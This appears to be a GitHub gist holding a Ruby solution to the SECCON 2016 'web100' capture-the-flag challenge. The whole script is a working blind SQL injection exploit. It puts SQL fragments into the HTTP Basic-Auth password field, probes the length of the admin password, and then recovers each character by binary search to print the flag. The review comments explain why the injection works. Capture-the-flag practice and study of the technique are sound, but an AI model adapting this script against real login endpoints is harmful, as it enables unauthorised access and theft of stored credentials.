@shiv3
Created December 12, 2016 18:07
SECCON web100
require 'net/http'
require 'uri'
# Sends one true/false probe about the length of the admin row's password.
#
# The HTTP Basic-Auth password field carries a SQL fragment that compares
# length(pass) against +l+ using the operator +o+; the username is fixed to
# 'admin'. Nothing is interpreted here: the caller inspects the raw body.
#
# NOTE(review): the probe is only meaningful if the CGI splices the Basic-Auth
# password into its SQL text. A bound parameter on the server side would make
# this value an ordinary (wrong) password. Presumably that is the flaw the
# challenge is built around.
#
# @param l [Integer] length to compare against
# @param o [String] SQL comparison operator placed between length(pass) and +l+
# @return [String] body of the HTTP response
def req_length(l, o)
  endpoint = URI.parse('http://basiq.pwn.seccon.jp/admin/admin.cgi')
  post = Net::HTTP::Post.new(endpoint.path)

  # Leading quote closes the server's string literal; the trailing "--"
  # comments out whatever the server appends after the password.
  comparison = o + l.to_s
  crafted = " ' or (id = 'admin' and length(pass)" + comparison + " ) ; -- ' "
  post.basic_auth 'admin', crafted

  response = Net::HTTP.start(endpoint.host, endpoint.port) do |conn|
    conn.request(post)
  end
  response.body
end
# Sends one true/false probe about a single character of the admin password.
#
# The Basic-Auth password field carries a SQL fragment comparing
# substring(pass, i + 1, 1) with the literal +s+ using operator +o+
# (SQL substring positions are 1-based, hence the + 1).
#
# NOTE(review): +s+ is placed between single quotes without escaping, so a
# candidate of "'" produces a malformed fragment. What the server answers in
# that case is not visible from here.
#
# @param s [String] candidate character
# @param o [String] SQL comparison operator
# @param i [Integer] zero-based index of the character being tested
# @return [Boolean] true when the response body contains "OK"
def req(s, o, i)
  endpoint = URI.parse('http://basiq.pwn.seccon.jp/admin/admin.cgi')
  post = Net::HTTP::Post.new(endpoint.path)

  position = (i + 1).to_s
  crafted = " ' or (id = 'admin' and substring(pass," + position + ",1)" + o + " '" + s + "' ) ; -- ' "
  post.basic_auth 'admin', crafted

  response = Net::HTTP.start(endpoint.host, endpoint.port) do |conn|
    conn.request(post)
  end

  # The only signal used is whether the page says "OK" (condition held).
  response.body.include?("OK")
end
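# Binary-searches the candidate alphabet for the character at index +i+,
# using req() as the comparison oracle, and echoes each probed candidate.
#
# The alphabet is " ".."`" followed by "{".."~", i.e. printable ASCII with
# a-z left out.
# NOTE(review): presumably lowercase is skipped because the server-side
# comparison is case-insensitive. If so, letter case in the result is not
# recoverable by this search. Confirm against the target's collation.
#
# Fixes over the earlier version:
# * the upper bound starts at the last valid index. Starting one past the end
#   let +mid+ land on a nil slot, and skipping that slot without moving either
#   bound never terminated;
# * when none of "<", ">", "=" holds (inconsistent or failed responses) the
#   search stops instead of re-sending the same three requests forever.
#
# @param i [Integer] zero-based index of the character to recover
# @return [String, nil] the matching candidate, or nil when none matches
def binserch(i)
  candidates = (" ".."`").to_a + ("{".."~").to_a
  low = 0
  high = candidates.length - 1

  while low <= high
    mid = (low + high) / 2
    probe = candidates[mid]
    print probe

    if req(probe, "<", i)
      high = mid - 1
    elsif req(probe, ">", i)
      low = mid + 1
    elsif req(probe, "=", i)
      return probe
    else
      # No ordering relation was confirmed; give up rather than spin.
      break
    end
  end

  puts ""
  nil
end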
# Driver: first find the password length, then recover it one character at a
# time and print the running result.
#
# Seen from the server, this is a long run of near-identical POSTs from one
# client, differing only in the Basic-Auth password value.
ans = []

# Length probe: the first i for which "length(pass) > i" is no longer "OK".
# len stays 0 when all 300 probes answer "OK".
len = 0
(0...300).each do |i|
  res = req_length(i, ">")
  p i, res[0, 10]
  next if res.include?("OK")

  len = i
  break
end
puts "passlength:#{len}"

# Character recovery: positions where binserch finds no match are skipped.
(0...len).each do |i|
  q = binserch(i)
  ans << q unless q.nil?
  p ans.join
end

puts "flag is :#{ans.join("")}"